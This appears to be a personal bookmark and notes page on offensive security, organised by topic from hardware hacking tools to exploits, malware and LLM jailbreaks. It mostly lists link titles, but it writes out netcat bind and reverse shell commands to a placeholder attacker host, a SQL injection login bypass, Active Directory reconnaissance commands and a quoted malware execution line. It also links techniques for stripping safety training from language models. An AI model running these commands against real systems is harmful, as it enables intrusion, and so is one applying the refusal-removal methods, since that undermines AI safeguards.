This Makes Hacking TOO Easy - Flipper Zero - YouTube

David Bombal
Flipper Zero: Hottest Hacking Device for 2023? - YouTube
Flipper Zero - YouTube

Custom Firmware

Flipper Zero Firmware Update via qFlipper

Unleashing the power of the Flipper Zero with custom firmware - YouTube
DarkFlippers/unleashed-firmware: Flipper Zero Unleashed Firmware

WiFi Dev Board

Flipper Zero: The Ultimate WI-FI Guide | Marauder ESP32 - YouTube
Flipper Zero: How To Run Marauder on the WiFi Dev Board - YouTube

Cars

Flipper Zero vs Cars, Bike locks, Alarm systems and Door chimes 😱 - YouTube

Warning! This is how cars are hacked. Just like in Mr Robot. - YouTube

jimilinuxguy/Tesla-Charging-Port-Opener: Files for HackRF + Portapack MAYHEM firmware to open any and all Tesla vehicle charging ports in range!

Rubber Ducky

ATMega32U4 can be used as an USB HID device

BadUSB - Wikiwand
Hak5 - USB Rubber Ducky - YouTube

Do NOT Plug This USB In! – Hak5 Rubber Ducky - YouTube
Introducing the NEW 🐤 USB Rubber Ducky - YouTube

What Is BadUSB? Definition and How To Prevent It | NinjaOne

bad USBs are SCARY!! (build one with a Raspberry Pi Pico for $8) - YouTube
dbisu/pico-ducky: Create a USB Rubber Ducky like device using a Raspberry PI Pico
SourasishBasu/PicoW-Ducky: Using Raspberry Pi Pico W as a Rubber Ducky to inject and execute payload scripts on a system
Upgrade The Cheapest USB Rubber Ducky with Raspberry Pi Pico + CircuitPython | by Febi Mudiyanto | Medium

cecio/USBvalve: Expose USB activity on the fly
USBvalve: Expose USB Activity On The Fly by Cesare Pizzi - YouTube

HackRF

Welcome to HackRF’s documentation! — HackRF documentation
It’s TOO Easy to Accidentally Do Illegal Stuff with This - YouTube

hackrf · GitHub Topics · GitHub
dressel/pyhackrf: A Python wrapper for libhackrf

pothosware/SoapySDR: Vendor and platform neutral SDR support library.
Home · pothosware/SoapySDR Wiki · GitHub

ICE9 Blog
mikeryan/ice9-bluetooth-sniffer: Wireshark-compatible all-channel BLE sniffer for bladeRF, with wideband Bluetooth sniffing for HackRF and USRP
Bluetooth Hacking: Tools And Techniques | Mike Ryan [@mpeg4codec] - Media Center | hardwear.io

Software Defined Radio with HackRF - Great Scott Gadgets

HackRF One - Great Scott Gadgets
Welcome to HackRF’s documentation! — HackRF documentation

Proxmark3

Proxmark3 Easy (Iceman Firmware) - RFID & NFC Chip Implants and Biohacking products

Getting started with the proxmark3 easy - DT Info - Dangerous Things Forum
RfidResearchGroup/proxmark3: Iceman Fork - Proxmark3

Binary Analysis/Malware Analysis/Reverse Engineering

reverse-engineering

Prover

math#Prover

Attacks/Vulnerbilities

Vulnerabilities and Exploits — ENISA
Zero-Day — ENISA

Low Level Learning
Eghad! Hackers! - YouTube

Exploiting V8 at openECSC Ʊ lyra's epic blog

首页 | 离别歌 PHITHON
首页 - 『代码审计』知识星球

Paper
PHITHON 的公开漏洞
Paper - Phith0n

Why the Traditional Security Operations Model Fails and How To Fix It
Open-Source Malware vs. Vulnerable Components: Knowing the Difference Matters
Linux Malware: What To Know About the Malware Threat
Linux Kernel Exploits: Common Threats and How To Prevent Them

Vulnerability Database

Vulnerability Databases: Is China's CNNVD Superior to the US NVD?

CWE - Common Weakness Enumeration
Home | CVE
NVD - Home

OWASP Top Ten | OWASP Foundation
OWASP Top 10

车联网产品安全漏洞专业库 CSVD

Google Hacking Database (GHDB) - Google Dorks, OSINT, Recon

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
Exploit-DB / Exploits + Shellcode + GHDB · GitLab
Exploit Database SearchSploit Manual

jfoote/exploitable: The 'exploitable' GDB plugin

Vulnerable Environments/靶機

OWASP Vulnerable Web Applications Directory | OWASP Foundation
vavkamil/awesome-vulnerable-apps: Awesome Vulnerable Applications

vulnerable-apps
vulnerable-apps/awesome-vulnerable: A curated list of VULNERABLE APPS and SYSTEMS which can be used as PENETRATION TESTING PRACTICE LAB.
vulnerable-apps/Vulnerable-JWT: Collection of vulnerable APIs/apps to test JWT attacks
vulnerable-apps/vuln_node_express

trailofbits/not-going-anywhere: A set of vulnerable Golang programs
trailofbits/not-slithering-anywhere: The Python Version of our Not Go-ing Anywhere Vulnerable Application

Download Metasploitable - Virtual Machine to Test Metasploit
rapid7/metasploitable3: Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

Vulhub - Docker-Compose file for vulnerability environment
vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

cider-security-research/cicd-goat: A deliberately vulnerable CI/CD environment. Learn CI/CD security through multiple challenges.

zhuifengshaonianhanlu/pikachu: 一个好玩的Web安全-漏洞测试平台

Generative AI

AI and Cybersecurity: The Dual Role of Automation in Threat Mitigation and Attack Facilitation
Fortifying Your Organization Against AI-Driven Injection Attacks

Now Scammers Are Sending Bank-Draining Malware Through Snail Mail: Here's How

Countdown to GovWare 2023 - The Application of Artificial Intelligence (AI) in Cybersecurity - NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks.

CyberNative/CyberBase-13b · Hugging Face

Jailbreak

Universal and Transferable Attacks on Aligned Language Models
[2307.15043] Universal and Transferable Adversarial Attacks on Aligned Language Models
llm-attacks/llm-attacks: Universal and Transferable Attacks on Aligned Language Models

Aligning language models to follow instructions | OpenAI
[2204.05862] Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback

[2406.11717] Refusal in Language Models Is Mediated by a Single Direction
Refusal in LLMs is mediated by a single direction — LessWrong

[2310.20624] LoRA Fine-tuning Efficiently Undoes Safety Training in Llama 2-Chat 70B

Maxime Labonne - Uncensor any LLM with abliteration

CyberPal.AI

[2408.09304v1] CyberPal.AI: Empowering LLMs with Expert-Driven Cybersecurity Instructions

CyberSecEval

[2404.13161v1] CyberSecEval 2: A Wide-Ranging Cybersecurity Evaluation Suite for Large Language Models
CYBERSECEVAL 3: Advancing the Evaluation of Cybersecurity Risks and Capabilities in Large Language Models | Research - AI at Meta

CyberSecEval 3 | CyberSecEval 3
PurpleLlama/CybersecurityBenchmarks at main · meta-llama/PurpleLlama ❗!important
meta-llama/PurpleLlama: Set of tools to assess and improve LLM security.

Project Naptime

Code scan to discovering vulnerability

Project Zero: Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
Project Zero: From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code

Smart Contracts

Introduction - Building Secure Contracts
crytic/building-secure-contracts: Guidelines and training material to write secure smart contracts
crytic/awesome-ethereum-security: A curated list of awesome Ethereum security references

Buffer Overflow

reverse-engineering#debugging

Buffer overflow - Wikiwand
Stack buffer overflow - Wikiwand
Heap overflow - Wikiwand
NOP slide - Wikiwand
Return-to-libc attack - Wikiwand

w00w00 on Heap Overflows - Wayback Machine
Linux Kernel Module (LKM) Hacking - Wayback Machine
Console IOCTLs Under Linux - Wayback Machine

Writing buffer overflow exploits - a tutorial for beginners

Stack buffer overflow

Mastering Buffer Overflow Exploits: A Complete Guide for CTF and Penetration Testing! - YouTube
Running a Buffer Overflow Attack - Computerphile - YouTube
how do hackers exploit buffers that are too small? - YouTube
HACKED! How a Buffer Overflow Exploit works, plus Code Red! - YouTube
BASIC Buffer Overflow | Ryan's CTF [13] Everyday I'm Bufferin - YouTube

Gallopsled/pwntools: CTF framework and exploit development library Python script to control and automate GDB, use GEF to lookup return address

John Hammond
Pwntools & GDB for Buffer Overflow w/ Arguments (PicoCTF 2022 #43 'buffer-overflow2') - YouTube
DANGEROUS C Functions gets & strcpy (PicoCTF 2022 #04 buffer-overflow0) - YouTube
TryHackMe! Buffer Overflow & Penetration Testing - YouTube complete flow for attack

PWN 101 - Buffer Overflow 【廣東話 CTF 新手教學】 - YouTube pwntools

Buffer Overflow Attack — Exploit Stack Based Buffer Overflow | by Dheeraj Deshmukh | System Weakness
Buffer Overflow Attack ( Part - II)— Mona Script | by Dheeraj Deshmukh | Medium

Return-Oriented Programming (ROP)

Return-oriented programming - Wikiwand

What is ROP - CTF Handbook
ROP Chaining: Return Oriented Programming | Red Team Notes
Return-Oriented Programming (ROP) Chain | by Imène ALLOUCHE | Medium

0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM/ARM64 binaries.

JonathanSalwan/ROPgadget: This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF, PE and Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC, MIPS, RISC-V 64, and RISC-V Compressed architectures.
Taking the Next Step: From Buffer Overflow Exploits to ROP Programming | LinkedIn

Process Injection

Defense Evasion (hides process execution), Privilege Escalation

Code & Process Injection - Red Team Notes
CreateRemoteThread Shellcode Injection - Red Team Notes
sample of shellcode injection into a process (Gray Hat Python)

How to Hook Win32 API With Kernel Patching
Process Introspection for Fun and Profit

sh4hin/GoPurple: Yet another shellcode runner consists of different techniques for evaluating detection capabilities of endpoint security solutions

ELFun File Injector - Malware - 0x00sec - The Home of the Hacker
User Mode Rootkits: IAT and Inline Hooking - Malware - 0x00sec - The Home of the Hacker
Process Injection: APC Injection - Malware - 0x00sec - The Home of the Hacker
Process Injection: Remote Thread Injection or CreateRemoteThread | Alion’s Blog
On Windows Syscall Mechanism and Syscall Numbers Extraction Methods

Docker Security: Docker Breakouts : Process Injection - YouTube
[Linux] Infecting Running Processes - Programming - 0x00sec - The Home of the Hacker
Programming for Wannabees. Part III. Your first Shell Code - Programming - 0x00sec - The Home of the Hacker
Linux Shellcoding (Part 1.0) - Exploit Development - 0x00sec - The Home of the Hacker

Back From the Grave: ELF32 Universal Command Injector
Dynamically Inject a Shared Library Into a Running Process on Android/ARM

Living off the land

living off the land: using tools at victim machine

How to Proxy Command Execution: "Living Off The Land" Hacks - YouTube
andrew-d/static-binaries: Various *nix tools built as statically-linked binaries

GTFOBins Linux
LOLBAS Windows, Living Off The Land Binaries, Scripts and Libraries, for Windows

DDExec

arget13/DDexec: A technique to run binaries filelessly and stealthily on Linux by "overwriting" the shell's process with another.
Run ANY Linux Program In Memory - YouTube

Cronjob

Using crontab and command injection privilege escalation | VK9 Security
Cron Jobs – Linux Privilege Escalation - Juggernaut-Sec

Remote Code Execution

reverse

This gist is that:

Cheating at video games - YouTube
Don’t try to sanitize input. Escape output.

Bind/Remote/Reverse shell

Bind shell: attacker connect to victim
Remote shell: victim connect to attacker

Reverse Shell Cheat Sheet | pentestmonkey
Reverse Shell Cheat Sheet - Internal All The Things
Detect reverse shells from multiple dimensions - Security Center - Alibaba Cloud Documentation Center

tennc/webshell: This is a webshell open source project
pureqh/webshell: 免杀webshell生成工具

Difference Between Bind Shell and Reverse Shell - GeeksforGeeks
Bind Shell 與 Reverse Shell | Puck's Blog
hackerschoice/thc-tips-tricks-hacks-cheat-sheet: Various tips & tricks

What Is a Web Shell & How Do I Dissect It?

Easy way to Generate Reverse Shell - Hacking Articles

Remote Shells. Part I - Networking - 0x00sec - The Home of the Hacker
Remote Shells. Part II. Crypt your link - Networking - 0x00sec - The Home of the Hacker
Remote Shells Part III. Shell Access your Phone - Networking - 0x00sec - The Home of the Hacker

Online - Reverse Shell Generator
My Pentest Tools
how to get remote access to your hacking targets // reverse shells with netcat (Windows and Linux!!) - YouTube

# [victim] bind shell, forward input to `sh`
nc -lvnp 5555 -e sh

# [attacker]
nc VICTIM 5555
# [attacker]
nc -lvnp 5555

# [victim] remote shell, forward input to `sh`
nc ATTACKER 5555 -e sh

t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

pwncat - reverse shell handler with all netcat features
cytopia/pwncat: pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
A Detailed Guide on Pwncat - Hacking Articles

calebstewart/pwncat: Fancy reverse and bind shell handler
pwncat documentation

SQL injection

Simple injection on username field: ANYNAME OR' 1=1 --

SQL injection - Wikiwand
SQL injection techniques - Getting started with SQL injection - YouTube
Step-by-step SQL injection guide to bypassing basic login screen - Mastering SQL injection - YouTube
What is SQL Injection? Tutorial & Examples | Web Security Academy
Web Security Academy - SQL Injection (Long Version) - YouTube

SQL Injection | OWASP Foundation
Blind SQL Injection | OWASP Foundation
SQL Injection Prevention - OWASP Cheat Sheet Series

7 essential SQL Server security tips | InfoWorld
bobby-tables.com: A guide to preventing SQL injection in {currlang}

SQL INJECTION — The Coolest Vulnerability | by Dheeraj Deshmukh | Medium
Preventing SQL Injection Attacks With Python – Real Python

sqlmap: automatic SQL injection and database takeover tool
Sqlmap使用详解-安全客 - 安全资讯平台
SQL注入漏洞详解-安全客 - 安全资讯平台
What is SQL Injection? Tutorial & Examples | Web Security Academy

sqlninja - a SQL Server injection & takeover tool

NoSQL injection

NoSQL Injection attack | Tutorials & Examples | Snyk Learn
NoSQL injection | Web Security Academy
NoSQL injection - HackTricks

WSTG - Latest | OWASP Foundation
SQL Injection in MongoDB: Examples and Prevention

node.js - Mitigating MongoDB injection attacks with Mongoose - Stack Overflow
How does MongoDB avoid the SQL injection mess? - Stack Overflow

JavaScript Prototype Poisoning

What is prototype pollution? | Tutorial & examples | Snyk Learn
Prototype-Poisoning | Fastify
JavaScript Prototype Poisoning Vulnerabilities in the Wild | by Bryan English ☜ | intrinsic | Medium

Hacking Kerberos

web-authentication#Active Directory

Learn Active Directory Kerberoasting - YouTube

get hash and crack offline
ParrotSec/mimikatz
GhostPack/Rubeus: Trying to tame the three-headed dog.
BloodHoundAD/BloodHound: Six Degrees of Domain Admin
CrackMapExec, using PSExec
Password Spray
invoke phantom disables eeeeeee Event Logs
DCSync, DCShadow
NTLM hash* (Pass The Hash attack), LM hash
Generate an NTLM Hash - NTLM Password - Online - Browserling Web Developer Tools

enterprise admin, KRBTGT ticket (Kerberoast), skeleton key, password access key, DSRM
domain admin
local admin

/do query domain controller

ipconfig /all
nslookup NAME /ip
net accounts /do
net user USER /do
net localgroup administrators
net localgroup administrators /do
net group HQ_Desktop_admin /do
nltest /dclist:astri.local
nltest /server:ASPDC02 /domain_trusts

PHP

Docker PHP 裸文件本地包含综述 | 离别歌 pearcmd.php RCE
Website Vulnerabilities to Fully Hacked Server - YouTube

Impact

Fork bomb

Understanding Fork Bombs in 5 Minutes or Less - YouTube
these characters will crash your computer - YouTube

DoS/DDoS

Denial-of-service attack - Wikiwand
SYN flood - Wikiwand
How to Prevent DDoS Attacks: 7 Tried-and-Tested Methods
How to Stop a DDoS Attack: 4 Steps to Take Now
How to Stop DDoS Attacks: 6 Tips for Fighting DDoS Attacks

Best Practices: DDoS preventative measures – Cloudflare Help Center
Cloudflare thwarts 17.2M rps DDoS attack — the largest ever reported
Identifying and Mitigating DDoS Attacks

LOIC download | SourceForge.net
Low Orbit Ion Cannon - Wikiwand
What is LOIC - Low Orbit Ion Cannon | DDoS Tools | Imperva

Slowloris (computer security) - Wikiwand
Slowloris HTTP DoS
gkbrk/slowloris: Low bandwidth DoS tool. Slowloris rewrite in Python.

Timing attacks

A Lesson In Timing Attacks (or, Don’t use MessageDigest.isEquals) | codahale.com

Use time difference in array comparison to brute force the digest byte by byte.

Heartbleed

Heartbleed Bug
Heartbleed - Wikiwand
Heartbleed – Andrew Kennedy

xkcd: Heartbleed Explanation
Heartbleed Report (2017-01) - Shodan

How I used Heartbleed to steal a site’s private crypto key – Ars Technica
Critical crypto bug exposes Yahoo Mail, other passwords Russian roulette-style | Ars Technica
Coder in a World of Code: My Heart Bleeds for OpenSSL

Shellshock

Shellshock (software bug) - Wikiwand

The Shellshock Bug In About Four Minutes - YouTube
Shellshock DIY – Andrew Kennedy
Troy Hunt: Everything you need to know about the Shellshock Bash bug
How to Protect Your Server Against the Shellshock Bash Vulnerability | DigitalOcean
Shellshock DHCP RCE Proof of Concept - TrustedSec - Information Security

Ransomware

Cyber Extortion vs. Ransomware: What's the Difference?
Linux Ransomware Threats: How Attackers Target Linux Systems DarkRadiation, RansomEXX
How Do We Build Ransomware Resilience Beyond Just Backups?

BREACH

BREACH ATTACK
BREACH (security exploit) - Wikiwand

Stuxnet

Stuxnet - Wikiwand
Stuxnet explained: The first known cyberweapon | CSO Online
Stuxnet: a 3-Parts Series | Curious Minds - Curious Minds Podcast
Stuxnet: Advanced Persistent Threat - Ran Levi
The Most Sophisticated Malware Ever Made (That We Know Of)🎙Darknet Diaries Ep. 29: Stuxnet - YouTube

Memory Address Scanning

Undermining Information Hiding (And What to do About it)

Row Hammering//Drammer/RAMpage

Row hammer - Wikiwand

Physical RAM attack can root Android and possibly other devices | InfoWorld
Google researchers hack computers using DRAM electrical leaks | Computerworld
Researchers develop astonishing Web-based attack on a computer's DRAM | Computerworld
Drammer: Deterministic Rowhammer Attacks on Mobile Platforms PDF
New Drammer Android Hack lets Apps take Full control (root) of your Phone
vusec/drammer: Native binary for testing Android phones for the Rowhammer bug

RAMPAGE AND GUARDION
Every Android Device Since 2012 Impacted by RAMpage Vulnerability

Dirty COW

Dirty COW (CVE-2016-5195)
Dirty COW - Wikiwand

RegreSSHion

OpenSSH 'RegreSSHion' RCE Vulnerability
xonoxitron/regreSSHion: CVE-2024-6387 (regreSSHion) Exploit (PoC), a vulnerability in OpenSSH's server (sshd) on glibc-based Linux systems.
xonoxitron/regreSSHion-checker: Quickly identifies servers vulnerable to OpenSSH 'regreSSHion' (CVE-2024-6387).

Meltdown and Spectre

Two major computer processor security bugs, dubbed Meltdown and Spectre, affect nearly every device made in the last 20 years.

What Is Speculative Execution? - ExtremeTech

Meltdown and Spectre
Spectre & Meltdown - Computerphile - YouTube
Meltdown: the latest news on two major CPU security bugs - The Verge
Meltdown, Spectre: The password theft bugs at the heart of Intel CPUs • The Register

What are the Meltdown and Spectre exploits? | Network World
New Spectre derivative bug haunts Intel processors | Network World
Microsoft, Google: We've found a fourth data-leaking Meltdown-Spectre CPU hole • The Register

Spectre/Meltdown/L1TF/MDS Mitigation Costs On An Intel Dual Core + HT Laptop - Phoronix
The Performance Impact Of MDS / Zombieload Plus The Overall Cost Now Of Spectre/Meltdown/L1TF/MDS - Phoronix

speed47/spectre-meltdown-checker: Spectre & Meltdown vulnerability/mitigation checker for Linux
IAIK/meltdown: This repository contains several applications, demonstrating the Meltdown bug.

MDS/ZombieLoad

MDS Attacks: Microarchitectural Data Sampling
ZombieLoad Attack

Microarchitectural Data Sampling (aka MDS, ZombieLoad, RIDL & Fallout) explained by Red Hat - YouTube
Buffer the Intel flayer: Chipzilla, Microsoft, Linux world, etc emit fixes for yet more data-leaking processor flaws • The Register
Intel CPUs impacted by new Zombieload side-channel attack | ZDNet

Intel Side Channel Vulnerability MDS
Deep Dive: Intel Analysis of Microarchitectural Data Sampling

RIP Hyper-Threading? ChromeOS axes key Intel CPU feature over data-leak flaws – Microsoft, Apple suggest snub • The Register

Intel CPUs can be exploited unless you disable hyper-threading, Linux dev claims | TechRadar

Static Analysis/Source Code Analysis

"Source code security audit speed run" - Eldar Marcussen - YouTube

Awesome Rank for mre/awesome-static-analysis
analysis-tools-dev/static-analysis: ⚙️ A curated list of static analysis (SAST) tools for all programming languages, config files, build tools, and more. The focus is on tools which improve code quality.
Source Code Analysis Tools | OWASP Foundation

How to Analyze Code for Vulnerabilities - YouTube
Is this okay!? How to review code for security issues - Rouan Wilsenach - NDC Security 2023 - YouTube

Mobile Security Framework · GitHub

Snyk Open Source Advisor | Snyk

Semgrep — Find bugs and enforce code standards
Explore | Semgrep
trailofbits/semgrep-rules: Semgrep queries developed by Trail of Bits.

ShiftLeft Inc. webgoat and tarpit
ShiftLeftSecurity/tarpit-java
ShiftLeftSecurity/tarpit-nodejs
ShiftLeftSecurity/tarpit-python
ShiftLeftSecurity/flask-webgoat

Many provide free service for open source projects

Codecov - Code Coverage
Coveralls - Test Coverage History & Statistics
Code Climate. Hosted static analysis for Ruby, PHP and JavaScript source code.
Dependency management + Code analytics for Node.js projects
Codacy | The fastest static analysis tool from setup to first analysis | Codacy
Code Quality and Code Security | SonarQube

Snyk | Developer Security | Develop Fast. Stay Secure.
snyk - npm

npm install -g snyk
cd your-app
snyk test
snyk wizard

chrisallenlane/drek: A static-code-analysis tool for performing security-focused code reviews. It enables an auditor to swiftly map the attack-surface of a large application, with an emphasis on identifying development anti-patterns and footguns. glorified grep
Source Code Auditing - YouTube

wireghoul/graudit: grep rough audit - source code auditing tool

How to Analyze Code for Vulnerabilities - YouTube
Powering up your source code auditing with parsers - YouTube Lazy Bloodhound, build on tree-sitter, for PHP

How to Analyze Code for Vulnerabilities - YouTube

pip audit
npm audit

Malware

MalwareTech
Malwarebytes Labs - The Security Blog From Malwarebytes | Malwarebytes Labs

Maldev Academy

Cheat-Sheets — Malware Archaeology logs genereated by malware

How Hackers Use netsh.exe For Persistence & Code Execution (Sliver C2) - YouTube
Modern Malware Is Stealthier Than Older Attacks: This Is How It Stays Hidden

The Art Of Malware - Bringing the dead back to life - Malware - 0x00sec - The Home of the Hacker old malware
Analyzing Modern Malware Techniques - Part 1 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 2 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 3 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 4 - Malware - 0x00sec - The Home of the Hacker

Database/Repo

NVD - Home
URLhaus | Browse
Malpedia (Fraunhofer FKIE)

Windows malware execution

Hackers Have a New Strategy - How to Defend Against It - YouTube
Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware

C:\Windows\System32\cmd.exe /c powershell -WindowStyle Hidden -Command ".\7za.exe x archive.7z -pFhu$$57csa -o\"c:\programdata\" -y > $null; rundll32 c:\programdata\19a.dll,oxgdXPSGPw

Obfuscation/Evasion

John Hammond
How Hackers & Malware Spoof Processes - YouTube
How Hackers Write Malware & Evade Antivirus (Nim) - YouTube
How Does Malware Know It's Being Monitored? - YouTube

IoT Malware

IoT Malware Droppers (Mirai and Hajime) - Malware - 0x00sec - The Home of the Hacker
jgamblin/Mirai-Source-Code: Leaked Mirai Source Code for Research/IoC Development Purposes

CPUS vulnerability

Attacking UNIX Systems via CUPS, Part I
we need to talk about the new Linux exploit (9.9 CVSS) - YouTube

Fileless Malware

The Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort” | Proofpoint US

PS4 Jailbreak

TheOfficialFloW/PPPwn: PPPwn - PlayStation 4 PPPoE RCE
the new PS4 jailbreak is sort of hilarious - YouTube